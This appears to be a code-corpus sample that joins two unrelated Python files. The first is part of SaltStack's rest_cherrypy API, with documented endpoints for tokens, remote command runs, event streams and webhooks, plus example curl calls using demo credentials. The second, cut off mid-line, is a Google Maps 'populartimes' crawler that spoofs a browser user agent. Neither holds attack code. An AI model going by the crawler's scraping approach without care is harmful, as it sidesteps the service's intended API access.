class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token:
# We want to at least make sure that the token isn't expired yet.
resolved_tkn = self.resolver.get_token(salt_token)
if resolved_tkn and resolved_tkn.get("expire", 0) > time.time():
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n"
while True:
# make sure the token is still valid
if not self._is_valid_token(auth_token):
logger.debug("Token is no longer valid")
break
data = next(stream)
yield "tag: {}\n".format(data.get("tag", ""))
yield "data: {}\n\n".format(salt.utils.json.dumps(data))
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(salt.utils.json.dumps(data)),
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
crawler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import calendar
import datetime
import json
import logging
import math
import re
import ssl
import threading
import urllib.request
import urllib.parse
from time import sleep, time
from queue import Queue
import requests
from geopy import Point
from geopy.distance import vincenty, VincentyDistance
# urls for google api web service
BASE_URL = "https://maps.googleapis.com/maps/api/place/"
RADAR_URL = BASE_URL + "radarsearch/json?location={},{}&radius={}&types={}&key={}"
NEARBY_URL = BASE_URL + "nearbysearch/json?location={},{}&radius={}&types={}&key={}"
DETAIL_URL = BASE_URL + "details/json?placeid={}&key={}"
# user agent for populartimes request
USER_AGENT = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/54.0.2840.98 Safari/537.36"}
class PopulartimesException(Exception):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error
"""
def __init__(self, expression, message):
self.expression = expression
self.message = message
def rect_circle_collision(rect_left, rect_right, rect_bottom, rect_top, circle_x, circle_y, radius):
# returns true iff circle intersects rectangle
def clamp(val, min, max):
# limits value to the range min..max
if val < min:
return min
if val > max:
return max
return val
# Find the closest point to the circle within the rectangle
closest_x = clamp(circle_x, rect_left, rect_right);
closest_y = clamp(circle_y, rect_bottom, rect_top);
# Calculate the distance between the circle's center and this closest point
dist_x = circle_x - closest_x;
dist_y = circle_y - closest_y;
# If the distance is less than the circle's radius, an intersection occurs
dist_sq = (dist_x * dist_x) + (dist_y * dist_y);
return dist_sq < (radius * radius);
def cover_rect_with_cicles(w, h, r):
"""
fully cover a rectangle of given width and height with
circles of radius r. This algorithm uses a hexagonal
honeycomb pattern to cover the area.
:param w: width of rectangle
:param h: height of reclangle
:param r: radius of circles
:return: list of circle centers (x,y)
"""
#initialize result list
res = []
# horizontal distance between circle centers
x_dist = math.sqrt(3) * r
# vertical distance between circle centers
y_dist = 1.5 * r
# number of circles per row (different for even/odd rows)
cnt_x_even = math.ceil(w / x_dist)
cnt_x_odd = math.ceil((w - x_dist/2) / x_dist) + 1
# number of rows
cnt_y = math.ceil((h-r) / y_dist) + 1
y_offs = 0.5 * r
for y in range(cnt_y):
if y % 2 == 0:
# shift even rows to the right
x_offs = x_dist/2
cnt_x = cnt_x_even
else:
x_offs = 0
cnt_x = cnt_x_odd
for x in range(cnt_x):
res.append((x_offs + x*x_dist, y_offs + y*y_dist))
# top-right circle is not always required
if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):
res = res[0:-1]
return res
def get_circle_centers(b1, b2, radius):
"""
the function covers the area within the bounds with circles
:param b1: south-west bounds [lat, lng]
:param b2: north-east bounds [lat, lng]
:param radius: specified radius, adapt for high density areas
:return: list of circle centers that cover the area between lower/upper
"""
sw = Point(b1)
ne = Point(b2)
# north/east distances
dist_lat = vincenty(Point(sw[0], sw[1]), Point(ne[0], sw[1])).meters
dist_lng = vincenty(Point(sw[0], sw[1]), Point(sw[0], ne[1])).meters
circles = cover_rect_with_cicles(dist_lat, dist_lng, radius)
cords = [
VincentyDistance(meters=c[0])
.destination(
VincentyDistance(meters=c[1])
.destination(point=sw, bearing=90),
bearing=0
)[:2]
for c in circles
]
return cords
def worker_radar():
"""
worker that gets coordinates of queue and starts radar search
:return:
"""
while True:
item = q_radar.get()
get_radar(item)
q_radar.task_done()
def get_radar(item):
_lat, _lng = item["pos"]
# places - nearby search
# https://developers.google.com/places/web-service/search?hl=en#PlaceSearchRequests
radar_str = NEARBY_URL.format(
_lat, _lng, params["radius"], "|".join(params["type"]), params["API_key"]
)
# is this a next page request?
if item["res"] > 0:
# possibly wait remaining time until next_page_token becomes valid
min_wait = 2 # wait at least 2 seconds before the next page request
sec_passed = time() - item["last_req"]
if sec_passed < min_wait:
sleep(min_wait - sec_passed)
radar_str += "&pagetoken=" + item["next_page_token"]
resp = json.loads(requests.get(radar_str, auth=('user', 'pass')).text)
check_response_code(resp)
radar = resp["results"]
item["res"] += len(radar)
if item["res"] >= 60:
logging.warning("Result limit in search radius reached, some data may get lost")
bounds = params["bounds"]
# retrieve google ids for detail search
for place in radar:
geo = place["geometry"]["location"]
if bounds["lower"]["lat"] <= geo["lat"] <= bounds["upper"]["lat"] \
and bounds["lower"]["lng"] <= geo["lng"] <= bounds["upper"]["lng"]:
# this isn't thread safe, but we don't really care,
# since in worst case a set entry is simply overwritten
g_places[place["place_id"]] = place
# if there are more results, schedule next page requests
if "next_page_token" in resp:
item["next_page_token"] = resp["next_page_token"]
item["last_req"] = time()
q_radar.put(item)
def worker_detail():
"""
worker that gets item of queue and starts detailed data retrieval
:return:
"""
while True:
item = q_detail.get()
get_detail(item)
q_detail.task_done()
def get_popularity_for_day(popularity):
"""
Returns popularity for day
:param popularity:
:return:
"""
# Initialize empty matrix with 0s
pop_json = [[0 for _ in range(24)] for _ in range(7)]
wait_json = [[0 for _ in range(24)] for _ in range(7)]
for day in popularity:
day_no, pop_times = day[:2]
if pop_times:
for hour_info in pop_times:
hour = hour_info[0]
pop_json[day_no - 1][hour] = hour_info[1]
# check if the waiting string is available and convert no minutes
if len(hour_info) > 5:
wait_digits = re.findall(r'\d+', hour_info[3])
if len(wait_digits) == 0:
wait_json[day_no - 1][hour] = 0
elif "min" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0])
elif "hour" in hour_info[3]:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60
else:
wait_json[day_no - 1][hour] = int(wait_digits[0]) * 60 + int(wait_digits[1])
# day wrap
if hour_info[0] == 23:
day_no = day_no % 7 + 1
ret_popularity = [
{
"name": list(calendar.day_name)[d],
"data": pop_json[d]
} for d in range(7)
]
# waiting time only if applicable
ret_wait = [
{
"name": list(calendar.day_name)[d],
"data": wait_json[d]
} for d in range(7)
] if any(any(day) for day in wait_json) else []
# {"name" : "monday", "data": [...]} for each weekday as list
return ret_popularity, ret_wait
def index_get(array, *argv):
"""
checks if a index is available in the array and returns it
:param array: the data array
:param argv: index integers
:return: None if not available or the return value
"""
try:
for index in argv:
array = array[index]
return array
# there is either no info available or no popular times
# TypeError: rating/rating_n/populartimes wrong of not available
except (IndexError, TypeError):
return None
def add_optional_parameters(detail_json, detail, rating, rating_n, popularity, current_popularity, time_spent):
"""
check for optional return parameters and add them to the result json
:param detail_json:
:param detail:
:param rating:
:param rating_n:
:param popularity:
:param current_popularity:
:param time_spent:
:return:
"""
if rating:
detail_json["rating"] = rating
elif "rating" in detail:
detail_json["rating"] = detail["rating"]
if rating_n:
detail_json["rating_n"] = rating_n
if "international_phone_number" in detail:
detail_json["international_phone_number"] = detail["international_phone_number"]
if current_popularity:
detail_json["current_popularity"] = current_popularity
if popularity:
popularity, wait_times = get_popularity_for_day(popularity)
detail_json["populartimes"] = popularity
if wait_times:
detail_json["time_wait"] = wait_times
if time_spent:
detail_json["time_spent"] = time_spent
return detail_json
def get_populartimes_from_search(place_identifier):
"""
request information for a place and parse current popularity
:param place_identifier: name and address string
:return:
"""
params_url = {
"tbm": "map",
"tch": 1,
"hl": "en",
"q": urllib.parse.quote_plus(place_identifier),
"pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
